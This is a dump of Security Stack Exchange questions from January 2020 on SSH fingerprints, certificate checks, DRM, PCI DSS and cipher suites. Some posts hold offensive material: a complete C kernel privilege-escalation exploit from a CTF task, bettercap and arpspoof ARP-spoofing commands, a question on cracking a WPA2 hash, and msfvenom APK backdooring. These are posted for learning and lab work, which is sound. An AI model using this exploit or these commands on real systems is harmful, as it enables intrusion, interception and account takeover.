+      1 02:bb:5a:18:f1:ea:ca:71:f1:52:12:16:8c:85:5b:cc.
+      3 02:c6:73:85:a9:94:82:f6:7e:51:a9:26:e7:d3:f7:7f.
+      2 03:53:8c:74:b5:c1:dd:e4:7d:4b:17:e1:05:47:60:68.
+      1 03:b3:c8:c6:c1:ef:54:28:65:4c:5f:73:f4:43:39:93.
+      2 03:c7:8a:76:77:39:55:96:2e:c0:13:4a:21:f2:0d:51.
+      2 06:8d:17:f9:cd:e0:10:4c:d0:44:58:8b:66:f8:f5:a8.
+      1 07:fa:59:2b:90:96:4a:4c:85:eb:4a:37:91:d7:8e:0f.
+      2 0d:21:b5:86:8e:ae:4e:97:87:f6:42:c7:e4:11:c0:4a.
+$ grep -hA1 'The fingerprint for the RSA key' /tmp/scp_*.log | grep -E '[0-9a-f:]{16}' | sort | uniq -c | wc -l
+253
+
+ +

I was confused by only three fingerprints but at this point I'm baffled by this number (253!!!) and ready to throw in the towel on trying to understand why this is happening. All I really have been able to figure out is that this started mid-November 2019.

+ +

But wait, there's more. Somehow, after seeing no successful authentications after this mysterious event in November, I saw some successful connections last week!

+ +
$ grep '^2019.*abc.*authenticated' sftp_8{1,2}.log | tail -2
+2019-11-17 13:00:02,623 [18508]: user 'abc' authenticated via 'publickey' method
+2019-11-17 13:00:17,351 [18514]: user 'abc' authenticated via 'publickey' method
+$ grep '^2020.*abc.*authenticated' sftp_8{1,2}.log
+2020-01-03 16:13:01,874 [6339]: user 'abc' authenticated via 'publickey' method
+2020-01-03 16:17:21,147 [6665]: user 'abc' authenticated via 'publickey' method
+2020-01-03 16:18:46,564 [6713]: user 'abc' authenticated via 'publickey' method
+2020-01-03 16:19:02,504 [6825]: user 'abc' authenticated via 'publickey' method
+2020-01-03 16:15:10,228 [24179]: user 'abc' authenticated via 'publickey' method
+2020-01-03 16:18:57,216 [24494]: user 'abc' authenticated via 'publickey' method
+$ 
+
+ +

To further muddy the waters, the customer server is not our hardware so I'm contractually limited in what I can do on this server.

+ +

Again, N-1 out of N (~70) customers can connect with the fingerprint I've seen for five years. I'm just looking for a push in the right direction. Thanks for reading!

+",224672,,,,,1/8/2020 20:31,Why am I getting seemingly random fingerprints back when connecting via SSH/SCP?,,0,2,1,,,CC BY-SA 4.0 +223878,1,,,1/8/2020 21:13,,2,28,"

I want to crack an 8 character password, but I know this password doesn't contain more than 4 symbols, 4 uppercase letters, 4 lowercase letters and 4 numbers, and it contains at least 2 symbols, 2 uppercase letters, 2 lowercase letters and 2 numbers.

+ +

The character set I'm using is 94 (brute-force) characters long. My PC has a rate of 70MH/s (roughly 70 000 000/s) with an GTX1660 Ti using hashcat. This means that I would take around 2 years and 9 months to reach the most unlucky end (keyspace).

+ +

With these limits, the time might decrease significantly, but how can I set such limits in hashcat (how do I create such mask)? +Also, how can I calculate it's time?

+",224674,,6253,,1/8/2020 22:15,1/8/2020 22:15,How can I crack WPA2 hash with some limitations?,,0,4,,1/8/2020 22:21,,CC BY-SA 4.0 +223880,1,,,1/8/2020 21:37,,0,2108,"

I found the following strange HTTP request apparently emanating from binaryedge.ninja:

+ +
 min-li-ustx-12-13-65991-x-prod.binaryedge.ninja - - [05/Jan/2020:07:18:48 -0500] ""GET / HTTP/1.0"" 302 212 ""-"" ""-""
+ min-extra-grab-108-ustx-prod.binaryedge.ninja - - [05/Jan/2020:07:18:52 -0500] ""GET / HTTP/1.0"" 302 212 ""-"" ""-""
+ min-extra-grab-108-ustx-prod.binaryedge.ninja - - [05/Jan/2020:07:18:54 -0500] ""HELP"" 400 226 ""-"" ""-""
+ min-extra-grab-108-ustx-prod.binaryedge.ninja - - [05/Jan/2020:07:18:54 -0500] ""\x1b\x84\xd5\xb0]\xf4\xc4\x93\xc50\xc2X\x8c\xda\xb1\xd7\xac\xafn\x1d\xe1\x1e\x1a3*\x85\xb7\x1d'\xb1\xc9k\xbf\xf0\xbc"" 400 226 ""-"" ""-""
+ min-extra-grab-108-ustx-prod.binaryedge.ninja - - [05/Jan/2020:07:18:56 -0500] ""\x16\x03\x01"" 400 226 ""-"" ""-""
+ min-extra-grab-108-ustx-prod.binaryedge.ninja - - [05/Jan/2020:07:18:58 -0500] ""\xbd\xff\x9e\xffE\xff\x9e\xff\xbd\xff\x9e\xff\xa4\xff\x86\xff\xc4\xff\xbe\xff\xc7\xff\xdb\xff\xee\xffx\\d9\xff\xed\xff\xa4\xff\x9d\xff\xcf\xff\xd8\xff\xe5\xff\x04\xff\x12\xff0\xff\xb1\xff\xbd\xff\xe7\xff\xe2\xff\xdd\xff\xdc\xff\xde\xff\xc8\xff\xcc\xff\xbe\xff\xf8\xff&\xff\x01\xff\x0f\xff\xf5\xff\x06\xff\xff\xff\xf7\xff!\xff\xde\xff\x02\xff&\xff\x0c\xff\x01\xff\xf5\xff"" 400 226 ""-"" ""-""
+
+ +

Looking around the web, I see similar log messages on other publicly visible web logs and one suggesting some connection to Gh0st.

+ +

Anyone have any idea what this is, and by this company would appear to be attacking my server and others?

+",40249,,40249,,1/8/2020 21:43,1/16/2020 23:42,Strange HTTP request from binaryedge.ninja,,1,4,,,,CC BY-SA 4.0 +223884,1,223889,,1/8/2020 23:53,,3,2218,"

When attempting to verify google server's certificate chain using openssl, I am getting error.

+ +

Extract google's server and intermediate certificates:

+ +
+

$ echo | openssl s_client -showcerts -connect www.google.com:443 | sed + -ne '/-BEGIN CERTIFICATE-/,/-END CERTIFICATE-/p' > /tmp/server_certs.crt

+
+ +

Extract google's root CA from jdk:

+ +
+

$ pwd

+ +

/cygdrive/c/Program Files/Java/jdk1.8.0_231/jre/lib/security

+ +

$ keytool -export -keystore cacerts -storepass changeit -alias 'globalsignr2ca [jdk]' -file /cygwin64/tmp/google_root.der

+ +

$ openssl x509 -in /tmp/google_root.der -out /tmp/google_root.pem -inform der

+
+ +

Also extracted google's root certificate from chrome browser to /tmp/google-chrome-root.pem. Doing a diff between chrome's root certificate and jdk extracted root certificate, there is no difference

+ +
+

$ diff /tmp/google_root.pem /tmp/google-chrome-root.pem

+ +

$ + Based on this, I know, I am using the right root certificate.

+
+ +

Invoke openssl verify

+ +
+

$ openssl verify -CAfile /tmp/google_root.pem /tmp/server_certs.crt

+ +

C = US, ST = California, L = Mountain View, O = Google LLC, CN = www.google.com

+ +

error 20 at 0 depth lookup: unable to get local issuer certificate + error /tmp/server_certs.crt: verification failed

+
+ +

I know verification through

+ +
+

$ openssl s_client -showcerts -servername www.google.com -connect www.google.com:443

+
+ +

is successful

+ +
CONNECTED(00000005) depth=2 OU = GlobalSign Root CA - R2, O =
+GlobalSign, CN = GlobalSign verify return:1 depth=1 C = US, O = Google
+Trust Services, CN = GTS CA 1O1 verify return:1 depth=0 C = US, ST =
+California, L = Mountain View, O = Google LLC, CN = www.google.com
+verify return:1
+
+ +

and was expecting a similar successful result through the openssl verify command as well.

+ +

I am doing this exercise in windows 10 and cygwin.

+",224680,,,,,1/9/2020 2:51,verification of certificate chain using openssl verify command,,1,2,,,,CC BY-SA 4.0 +223890,1,223892,,1/9/2020 2:55,,4,1407,"

I need to photograph an image containing a steganographically hidden message, then decode the stego content from the photograph without recourse to the original image data. Are there any steganography algorithms that would make the task more reliable?

+ +

Note: I tried the Least Significant Bit (LSB) method, but when I processed the photos from the camera there was too much distortion.

+",188275,,113729,,1/10/2020 7:28,1/11/2020 18:21,How can I recover steganographically hidden data from a photographic copy of the image?,,2,3,1,1/12/2020 4:37,,CC BY-SA 4.0 +223891,1,,,1/9/2020 3:51,,2,409,"

I am currently trying to perform a MitM attack on my home wireless network to get a better understanding on how this attack works. I can successfully perform this attack on a NAT network on some virtual machines but it will not work on my home wireless network with an external WiFi adapter. More specifically, the target devices are not able to load webpages even while still connected to the WiFi. However, I can still view the packets sent from the device to the gateway.

+ +

I have used Bettercap, Ettercap and arpspoof to try and accomplish this and it all fails with the same result. I'm positive that the target IP and the gateway is specified for each tool and I made sure that I enabled portforwarding with echo 1 > /proc/sys/net/ipv4/ip_forward.

+ +

My only logical conclusion is that it is somehow not successfully redirecting the packets from the target machine to the gateway and vice versa.

+ +

Is anyone able to suggest any fixes? Are some routers able to prevent MitM attacks? Any insight would be greatly appreciated.

+ +

(I am using an Alfa AC1200 wireless adapter and running Kali on a VM. I also have a Bell HomeHub 3000 which is from what I believe exclusive to Canada and manufactured by Sagecom.)

+ +

Edit:

+ +

Bettercap

+ +

bettercap -iface wlan0 +net.probe on +set arp.spoof.targets 192.168.2.28 +set arp.spoof.fullduplex true +arp.spoof on +set net.sniff.local true +net.sniff on

+ +

Arpspoof

+ +

arpspoof -i wlan0 -t 192.168.2.28 -r 192.168.2.1

+",224690,,224690,,1/10/2020 2:07,1/10/2020 2:07,MitM Attack Fails on Home Wireless Router,,0,2,,,,CC BY-SA 4.0 +223893,1,,,1/9/2020 6:50,,3,229,"

I have been looking at OWASP and other forms of checklists on testing web applications. One of the best practices is to ensure session IDs generated are sufficiently random and unpredictable.

+ +

Assuming that I am a corporate end user without having permissions to install software on my laptop, to test the security of a web application from my web browser.

+ +

From my understanding, if we were to have a web app that always enforce an encrypted HTTPS (SSL/TLS) connection to prevent the disclosure of the session ID through MitM (Man-in-the-Middle) attacks, this ensures that anyone cannot simply capture the session ID from web browser traffic.

+ +

If the session IDs are indeed encrypted due to HTTPS, are we still able to determine if the session IDs are sufficiently random and unpredictable? I was asking myself this question and for me, a close and probable answer I would give myself, is no. (I might be wrong)

+ +

Am I also right to say, to know that if session IDs are generated randomly and unpredictably, you would actually need to have access to the internal web application code? There are probably a lot more that I can't do without additional tools to gather more information on the web application.

+ +

What are the other kind of test cases - as an end user, who might not have advanced tools to sniff the network or to read underlying code, to test more comprehensively and value-add on my test cases on the web applications? For e.g. testing for invalid input and seeing if errors are thrown.

+",224694,,224694,,1/9/2020 6:55,1/29/2022 13:08,Testing web applications from an end user's perspective,,2,1,,,,CC BY-SA 4.0 +223898,1,,,1/9/2020 8:44,,1,105,"

While trying to solve old ctf task (https://blog.frizn.fr/plaidctf-2013/pwn-400-servr) I've encountered a situation which I don't understand.

+ +

TLTR

+ +

After escalating process privileges my exploit invokes system(""/bin/sh""). The shell gets spawned, but after first command (which gets executed as root) kernel panics.

+ +

+ +

Long description

+ +

I abuse kernel heap overflow to overwrite allocated file struct's file_operations field with an address of fake struct file_operations. +Fake struct file_operations is filled with address of escalate function. +Then I call lseek on a file and the function escalate file_operations get invoked. +If escalate function got called (meaning I've overwrote right struct file) I call pop_shell function:

+ + + +
void pop_shell() {
+    printf(""\t[+] Poping shell... have fun!\n"");
+    system(""/bin/sh"");
+    printf(""\t[ ] Had fun?\n"");
+    exit(0);
+}
+
+ +

The shell get's spawned and I can even execute one command such as cat /root/flag. The result gets displayed and then kernel immediately panics. I would expect kernel to panic after I exit system(""/bin/bash""), not after executing exactly one command. I would be super happy to hear a explanation for why it happens.

+ +

Full exploit:

+ + + +
/**
+ * Compile with: gcc exploit.c -o exploit -O0 -std=c99 -Wall --static
+ */
+
+#define _GNU_SOURCE
+#include <asm/types.h>
+#include <mqueue.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <sys/un.h>
+#include <linux/netlink.h>
+#include <pthread.h>
+#include <errno.h>
+#include <stdbool.h>
+#include <sched.h>
+#include <stddef.h>
+#include <sys/mman.h>
+#include <stdint.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <netinet/in.h>
+#include <arpa/inet.h>
+
+typedef int (*commit_creds_func_t)(void *new);
+typedef void *(*prepare_kernel_cred_func_t)(void *daemon);
+
+#define SERVER_PORT 80
+#define HEAP_SPRAY_POWER 0x400
+#define FILE_STRUCT_SLAB_SIZE 256
+#define MSG_PREFIX ""GET aaa HTTP/1.1\r\n""   \
+                   ""Content-Length:232\r\n"" \
+                   ""\r\n""
+
+#define COMMIT_CREDS ((void *)0xffffffff81063250)
+#define PREPARE_KERNEL_CRED ((void *)0xffffffff81063510)
+
+#define commit_creds(cred) \
+    (((commit_creds_func_t)(COMMIT_CREDS))(cred))
+#define prepare_kernel_cred(daemon) \
+    (((prepare_kernel_cred_func_t)(PREPARE_KERNEL_CRED))(daemon))
+
+
+int g_server_sock_fd;
+int g_fds[HEAP_SPRAY_POWER];
+uint64_t g_fake_fops[20];
+uint64_t g_overflow_msg[37];
+size_t g_overflow_msg_len;
+int g_escalated;
+
+
+void pop_shell() {
+    printf(""\t[+] Poping shell... have fun!\n"");
+    system(""/bin/sh"");
+    printf(""\t[ ] Had fun?\n"");
+    exit(0);
+}
+
+void escalate()
+{
+    commit_creds(prepare_kernel_cred(NULL));
+    g_escalated = 1;
+}
+
+int send_overflow_msg()
+{
+    if (write(g_server_sock_fd, g_overflow_msg, g_overflow_msg_len) < 0)
+    {
+        perror(""\t[!] Failed to send msg"");
+        return -1;
+    }
+    printf(""\t[+] Send msg\n"");
+
+    return 0;
+}
+
+int init()
+{
+    struct sockaddr_in server_addr;
+
+    g_server_sock_fd = socket(AF_INET, SOCK_STREAM, 0);
+    if (g_server_sock_fd < 0)
+    {
+        perror(""\t[!] Failed to create socket"");
+        return -1;
+    }
+    printf(""\t[+] Created socket\n"");
+
+    bzero(&server_addr, sizeof(server_addr));
+    server_addr.sin_family = AF_INET;
+    server_addr.sin_addr.s_addr = inet_addr(""127.0.0.1"");
+    server_addr.sin_port = htons(SERVER_PORT);
+    if (connect(g_server_sock_fd, &server_addr, sizeof(server_addr)) != 0)
+    {
+        perror(""\t[!] Failed to connect to server"");
+        return -1;
+    }
+    printf(""\t[+] Connected to server\n"");
+
+    for (int i = 0; i < 20; ++i)
+    {
+        g_fake_fops[i] = (uint64_t)&escalate;
+    }
+
+    /* Fill g_overflow_msg structure with msg_prefix concatenated with addresses of g_fake_fops. */
+    g_overflow_msg_len = strlen(MSG_PREFIX) + FILE_STRUCT_SLAB_SIZE;
+    memcpy((void *)g_overflow_msg, MSG_PREFIX, strlen(MSG_PREFIX));
+    /* This is possible as strlen(MSG_PREFIX) % 8 == 0. */
+    for (int i = strlen(MSG_PREFIX) / sizeof(uint64_t); i < g_overflow_msg_len / sizeof(uint64_t); ++i)
+    {
+        g_overflow_msg[i] = (uint64_t)&g_fake_fops;
+    }
+
+    g_escalated = 0;
+
+    printf(""\t[i] Address of g_fake_fops: %p\n"", g_fake_fops);
+    printf(""\t[i] Address of escalate function: %p\n"", &escalate);
+    printf(""\t[i] Address of g_escalated: %p\n"", &g_escalated);
+    return 0;
+}
+
+void overflow_struct_file()
+{
+    char file_path[0x100];
+
+    /* Make kernel allocate multiple struct file. */
+    for (int i = 0; i < HEAP_SPRAY_POWER; ++i)
+    {
+        sprintf(file_path, ""/tmp/file_%d"", i);
+        g_fds[i] = open(file_path, O_CREAT | O_RDWR, 0644);
+    }
+    /* Now make kernel free every second struct file, creating holes in slabs. */
+    for (int i = 0; i < HEAP_SPRAY_POWER; i += 2)
+    {
+        if (g_fds[i])
+        {
+            close(g_fds[i]);
+            g_fds[i] = 0;
+        }
+    }
+    /* And quickly try to allocate msg so it lands in the hole and overflow one of the struct files. */
+    send_overflow_msg();
+}
+
+int main()
+{
+    printf(""*** Starting Exploit ***\n"");
+
+    printf(""[ ] Initializing...\n"");
+    if (init() < 0)
+    {
+        printf(""[-] Failed to initialize\n"");
+        return -1;
+    }
+    printf(""[+] Succeeded to initialize\n"");
+
+    printf(""[ ] Overflowing struct file...\n"");
+    overflow_struct_file();
+    printf(""[+] Finished overflow phase, can't be sure yet if we succeeded\n"");
+
+    /* Wait 3 seconds to know if we havn't overwriten some critical structure instead of struct file. */
+    printf(""Sleeping... (if kernel panic now, it means we overflowed not ours stuct)"");
+    fflush(stdout);
+    for (int i = 0; i < 3; ++i)
+    {
+        sleep(1);
+        printf("" %i"", i);
+        fflush(stdout);
+    }
+    printf(""\n"");
+
+    printf(""[ ] Triggering exploit...\n"");
+    for (int i = 0; i < HEAP_SPRAY_POWER && !g_escalated; ++i)
+    {
+        if (g_fds[i])
+            lseek(g_fds[i], 0, SEEK_END);
+    }
+
+    if (g_escalated) {
+        printf(""[+] Exploit succeeded\n"");
+        pop_shell();
+    }
+    printf(""[-] Exploit failed\n"");
+
+    return 0;
+}
+
+",222863,,,,,1/9/2020 8:44,Kernel exploit fails after executing first command,,0,0,,,,CC BY-SA 4.0 +223901,1,,,1/9/2020 8:58,,2,115,"

I keep on receiving email which is intend to be received by a gmail id similar to be mine, with no dots(.) in gmail id of other party. +For example : my email id is john.grisham@gmail.com +the inbox of above email ids, get emails intended to be received by johngrisham@gmail.com

+ +

Question 1: The other party will also be receiving my emails ? +Question 2: How can i get rid of this problem?

+",224663,,,,,1/9/2020 9:25,"Gmail Email id, dot(.) recognition",,1,2,,1/9/2020 9:27,,CC BY-SA 4.0 +223903,1,223965,,1/9/2020 9:41,,5,1648,"

I am performing some research on IoT test tools and came across the HackRF One which can transmit and receive from 1 MHz to 6 GHz. I therefore think that it can analyze many protocols, but I cannot find a list of them anywhere. Can it for example analyze (and exploit) Zigbee, Z-Wave, LoRaWAN, RFID and NFC? Why is there no list, because there are too many protocols? Is the HackRF a more general sniffer then?

+ +

I also came across some specific protocol sniffers, like the Suphacap Z-Wave Sniffer and the Proxmark and so on. What are the advantages of these over the HackRF? Is the best option to start with a HackRF and then when necessary buy specific sniffers according to the needs of the current pentest?

+ +

I would like to know this, because then I know which devices to afford for penetration testing.

+",219620,,,,,3/24/2020 18:53,What are the advantages and disadvantages of using a HackRF One compared to specific protocol sniffers?,,3,5,,,,CC BY-SA 4.0 +223904,1,223907,,1/9/2020 11:21,,3,1677,"

I'm building a fairly simple web application at the moment but because I have plans on turning this into sort of a multi-project portfolio app, I've decided to decouple the back-end and the front-end. That way I can easily integrate my other projects into this front-end.

+ +

At the moment I have a public GET route that anyone can visit to see info about a project (api/project/id), this only fetches data from the corresponding ID and returns a JSON collection. I then use React to consume it and display the data.

+ +

Since this part is supposed to be publicly accessible I can't use JWT or user authentication to protect it, and you can't delete, edit or put things into the database from it. It's not insecure because all you can do is read data from the project with ID (which is properly escaped).

+ +

But this also means anyone can look at my React code, find the API link and then use my JSON data (for whatever reason). I don't think it's really a problem but is there anyway you can protect the public endpoint so that only my server can actually use it?

+ +

The back-end is on port 8080 and the front-end is on port 80. The back-end is PHP, both the front-end and back-end is served by nginx. CORS is enabled since they are on two different ports.

+ +

I know I can check the origin header and match it against my front-end but surely the origin header can be spoofed. I can't use authentication since it is supposed to be public but I'd like it to be only accessible to my server and then publicly displayed.

+ +

Maybe I can reverse proxy it somehow so they both listen on 80 while still being on two different ports? I have UFW on my server, can I only allow connections to port 8080 from my own server IP/domain? Can I check the IP of the request to the back-end, since my front-end is requesting it then in my API I should be able to only allow my own servers IP to access it?

+ +

I hope you understand what I mean and I understand that it might be a non-issue because in the end all they can do is read data that they can anyways read by just going to the ""intended"" front-end site. But at the moment I can use ajax from any computer/server to fetch the JSON data and that is basically what I want to prevent so that the only way to view the data is from it's ""intended source/design"" (i.e. via the front-end)

+ +

Basically an API for public content delivery but only allowing my server to access and display it.

+",224709,,224709,,1/9/2020 11:28,1/9/2020 12:07,Protect public(?) API endpoints,,1,0,1,,,CC BY-SA 4.0 +223905,1,223909,,1/9/2020 11:38,,0,287,"

A strict interpretation of that rule would seem to prohibit any non-payment related web browsing by PCs that are used to transmit card details to a payment processor, and perhaps also prohibit web browsing by any PCs on the same LAN as a card processing PC.

+ +

However, it appears that rule has been interpreted by others more broadly.

+ +
+

In requirement 1.2, we are ensuring that the firewall configuration is + designed to be least allowed – allowing the least number of ports + necessary for business to occur. This does not require you to drop + everything, you must justify each port required and implement only + those required to do business. An untrusted network is one which your + firm does not control, such as the Internet or a partner network.

+
+ +

source

+ +
+

Specific to PCI DSS 1.2.1, it says that your organization is only + allowed to use the protocols, ports, and services that are required + for the operation of your business.

+
+ +

source

+ +

Can anyone provide confirmation or clarification?

+",136292,,6253,,1/9/2020 12:28,1/9/2020 12:40,PCI DSS 1.2.1 Restrict inbound and outbound traffic to that which is necessary for the cardholder data environment,,1,0,,,,CC BY-SA 4.0 +223908,1,,,1/9/2020 12:21,,1,169,"

After reading JSON Web Encryption (JWE) and making a Node JS JWE POC demonstrating key mode using Key Encryption. I'm a bit confused as to how to validate that the sender of the message was in fact, the actual sender (not a man-in-the-middle with access to the public key).

+

With PGP, public keys are exchanged, and the message is validated against the digital signature. Is it possible to do the same with the JWS and JWE specs? I had a feeling this would somehow be done in the ADD, but doesn't appear to be the case as this is computing the AAD for the purpose of the Auth Tag. Obviously the Public Keys would have to be exchanged for this to work.

+",224693,,-1,,10/7/2021 8:14,1/28/2022 20:04,Public Digital Signature Validation with JWE,,1,0,,,,CC BY-SA 4.0 +223915,1,223917,,1/9/2020 14:18,,3,335,"

From an information security aspect, is there a difference between saying ""read-only"" or ""write-protected"" storage/memory?

+ +

Is there a chance that a read-only memory would not be write-protected at the same time?

+ +

In addition, is the OTP (one-Time-Programmable) memories better described as write-protected memories or as Read-only memories?

+",190661,,6253,,1/9/2020 14:58,1/9/2020 15:00,Read-only vs. Write-protected,,1,0,,,,CC BY-SA 4.0 +223916,1,223918,,1/9/2020 14:24,,3,181,"

There is a website which I want to register for but it is a internship/job-seeking website and thus on registration some VERY sensitive data is required.

+ +

When registering Firefox alerted me that the site was only HTTP, so I tried prefixing https:// and the page doesn't exist. I contacted the site administrator to ask them and they said:

+ +
+

appropriate security measures have been provided to guarantee the personal data security. As for the SSL certificate (recommended by the GDPR), we will provide with this one as soon as possible.

+
+ +

I know very little about security, so I am hoping someone could tell me whether what they are saying holds water and it could be a secure site that has yet to use a SSL certificate (it seems unlikely if they are only using HTTP)

+ +

If the statement doesn't hold water, and the administrator agrees to it, is there a way that I can package and send the data to them securely by alternative means?

+",224728,,149676,,1/9/2020 14:47,1/9/2020 15:35,A workaround for external website's HTTP registration page,,1,7,,,,CC BY-SA 4.0 +223919,1,,,1/9/2020 15:20,,1,39,"

I remember a security measure I've seen on a few sites in the past against phishing, but I don't know what it's called. When the user logs in, or just inputs their username, the site shows some kind of secret word / phrase / drawing. That word / phrase / drawing is something the user always sees, so it's proof for them that they're talking to the real site.

+ +

I know that American Express uses it, and I've seen a few other sites in the past use it too.

+ +

Does anyone know what it's called?

+",16116,,6253,,1/9/2020 15:24,1/9/2020 15:24,Name of security measure that shows user a personal word / phrase / drawing,,0,3,,1/9/2020 19:14,,CC BY-SA 4.0 +223923,1,,,1/9/2020 16:02,,0,298,"

I am using msfvenom to backdoor an Android apk. It is supposed that msfvenom adds extra permissions to original AndroidManifest:

+ +
[*] Poisoning the manifest with meterpreter permissions..
+[*] Adding <uses-permission android:name=""android.permission.READ_CONTACTS""/>
+[*] Adding <uses-permission android:name=""android.permission.CHANGE_WIFI_STATE""/>
+[*] Adding <uses-permission android:name=""android.permission.CALL_PHONE""/>
+[*] Adding <uses-permission android:name=""android.permission.RECORD_AUDIO""/>
+...
+
+ +

When I install the app in the Android phone, it just asks to allow default app permissions and not the injected ones.

+ +

Can anyone knows what can I do to edit the orignal apk code to ask for this permissions or how can I solve it?

+ +

Thank you in advance.

+",142487,,,,,1/9/2020 16:02,msfvenom: backdoored apk,,0,2,,,,CC BY-SA 4.0 +223924,1,223930,,1/9/2020 16:28,,2,551,"

I am having trouble understanding the point of EAP.

+ +

EAP is an authentication framework, which defines several TLS based methods and encapsulations like EAP-TLS, EAP-TTLS and PEAP. These all require the server/authenticator to have a certificate (EAP-TLS require the client/supplicant to have it too).

+ +
    +
  • TLS provides authentication with the use of certificates on its own. Then what is the point of EAP?
  • +
  • Is EAP better in some way?
  • +
  • The most notable usage of EAP is WPA. Is it advantageous to use it on wired connections too compared to plain TLS?
  • +
  • When would you rather use one or the other?
  • +
+",221056,,,,,1/9/2020 22:23,EAP vs TLS authentication,,2,0,1,,,CC BY-SA 4.0 +223925,1,223973,,1/9/2020 16:30,,3,3004,"

In some Java code that I'm reading, I stumbled over the following encryption algorithms passed to the Cipher.getInstance(...) method:

+ +
    +
  • AES/CBC/PKCS5Padding
  • +
  • DESede/ECB/PKCS5Padding
  • +
  • RSA/ECB/PKCS1Padding
  • +
+ +

Note: In the Java model, the first substring represents the cipher, the second the mode of operation, and the third the padding scheme.

+ +

Now, I believe that ECB is generally insecure (independently of the used cipher / padding scheme), because it preserves the structure of the plaintext.

+ +

In addition, I also read that CBC can be insecure, depending on the implementation. More precisely, if the implementation is written in such a way that it is revealed whether some given ciphertext was correctly padded or not, then this can be exploited to decrypt encrypted messages. In the case of Java, the problem is that different platforms / Java implementations / crypto providers are available, so it's hard to tell in general whether using CBC as a mode of operation is fine.

+ +

That leads me to think that all three of the above algorithms are potentially insecure. But perhaps I'm overestimating the problems of ECB / CBC, and they can be used in a secure way?

+ +

Hence the question: Can/Should the above algorithms be considered as secure or not, and why?

+ +

Update: To provide some more context, the code I'm referring to is the OWASP Benchmark. This benchmark consists of thousands of test cases, some of which intentionally contain actual vulnerabilities, while others intentionally contain ""fake"" vulnerabilities (i.e., code that looks like it might be vulnerable but actually isn't). Some of the test cases labeled as ""fake vulnerabilities"" encrypt some text using one of the three algorithms mentioned above. Since OWASP considers these as ""fake vulnerabilities"", that implies that OWASP considers these algorithms as safe, which surprised me. I'm wondering whether OWASP is right in considering these algorithms as safe, or whether these test cases in the OWASP Benchmark really ought to be labeled as ""actual vulnerabilities"" rather than ""fake vulnerabilities"".

+ +

An example of such a ""fake vulnerability"" test case in the OWASP Benchmark is the test case 54, which encrypts some data using AES/CBC/PKCS5Padding, but is labeled as not being vulnerable to CWE 327: Use of a Broken or Risky Cryptographic Algorithm.

+",184963,,184963,,1/10/2020 10:41,2/12/2022 22:38,Are ECB and CBC modes of operation generally insecure?,,2,3,,,,CC BY-SA 4.0 +223929,1,,,1/9/2020 17:13,,19,3146,"

I am trying to understand how DRM works under the hood. There doesn't seem to be much information about it on the web so I figured I would ask here.

+ +

After some attempted research, I found it extremely difficult to find any information regarding how Widevine or FairPlay DRM actually works. There is some general information about Content Decryption Module (CDMs) and such but how it actually works seems to be a mystery. I am wondering if this is intentional because much of DRM is maybe security through obscurity.

+ +

My basic/abstract understanding of DRM is that a file is encrypted usually using AES. When the file is attempted to be accessed by the DRM solution a key is transferred from a server to the CDM for it to be decrypted using some proprietary method (this is the part I am looking to understand better). The decrypted content is then given back to the application, often a browser, for playback. Is this correct?

+ +

If the above is the case, I assume that an attacker could simply edit the binary for the CDM to access the key or the file after is decrypted.

+",163099,,163099,,1/9/2020 17:24,1/13/2020 11:51,"How does Widevine, FairPlay, and other DRM's work under the hood?",,3,3,6,,,CC BY-SA 4.0 +223931,1,223932,,1/9/2020 17:44,,0,5554,"

I have a c program that gets the router IP and netmask and puts it into a text file in the format of 192.168.1.1/24. When I issue the nmap scan command with the target text file I get the unable to split netmask from target expression error.

+ +

This should work... issuing the nmap command with the ip/mask specified rather than reading from file works obviously. Issuing a different nmap command when reading from file with just the ip address in works as well. Only when the /24 is on the end of the address does the error occur.

+ +

Is this down to a fundamental flaw in the nmap file reader or is there a way around this?

+ +

I am issuing the commands with the popen function in C

+ +
scan = popen(""nmap -sn /tmp/file.txt"", ""r"");
+
+",224741,,6253,,1/9/2020 19:11,1/9/2020 19:12,nmap - how can I input a target to nmap from a file with the netmask attached?,,1,1,,,,CC BY-SA 4.0 +223933,1,223940,,1/9/2020 19:05,,1,170,"

openssl ciphers -v 'ECDH+AESGCM:DH+AESCGM' gives:

+ +
ECDHE-RSA-AES256-GCM-SHA384 TLSv1.2 Kx=ECDH     Au=RSA  Enc=AESGCM(256) Mac=AEAD
+ECDHE-ECDSA-AES256-GCM-SHA384 TLSv1.2 Kx=ECDH     Au=ECDSA Enc=AESGCM(256) Mac=AEAD
+ECDH-RSA-AES256-GCM-SHA384 TLSv1.2 Kx=ECDH/RSA Au=ECDH Enc=AESGCM(256) Mac=AEAD
+ECDH-ECDSA-AES256-GCM-SHA384 TLSv1.2 Kx=ECDH/ECDSA Au=ECDH Enc=AESGCM(256) Mac=AEAD
+ECDHE-RSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH     Au=RSA  Enc=AESGCM(128) Mac=AEAD
+ECDHE-ECDSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH     Au=ECDSA Enc=AESGCM(128) Mac=AEAD
+ECDH-RSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH/RSA Au=ECDH Enc=AESGCM(128) Mac=AEAD
+ECDH-ECDSA-AES128-GCM-SHA256 TLSv1.2 Kx=ECDH/ECDSA Au=ECDH Enc=AESGCM(128) Mac=AEAD
+
+ +

whereas openssl ciphers -v 'DH+AESGCM:ECDH+AESGCM' gives

+ +
DH-DSS-AES256-GCM-SHA384 TLSv1.2 Kx=DH/DSS   Au=DH   Enc=AESGCM(256) Mac=AEAD
+DHE-DSS-AES256-GCM-SHA384 TLSv1.2 Kx=DH       Au=DSS  Enc=AESGCM(256) Mac=AEAD
+DH-RSA-AES256-GCM-SHA384 TLSv1.2 Kx=DH/RSA   Au=DH   Enc=AESGCM(256) Mac=AEAD
+DHE-RSA-AES256-GCM-SHA384 TLSv1.2 Kx=DH       Au=RSA  Enc=AESGCM(256) Mac=AEAD
+ADH-AES256-GCM-SHA384   TLSv1.2 Kx=DH       Au=None Enc=AESGCM(256) Mac=AEAD
+DH-DSS-AES128-GCM-SHA256 TLSv1.2 Kx=DH/DSS   Au=DH   Enc=AESGCM(128) Mac=AEAD
+DHE-DSS-AES128-GCM-SHA256 TLSv1.2 Kx=DH       Au=DSS  Enc=AESGCM(128) Mac=AEAD
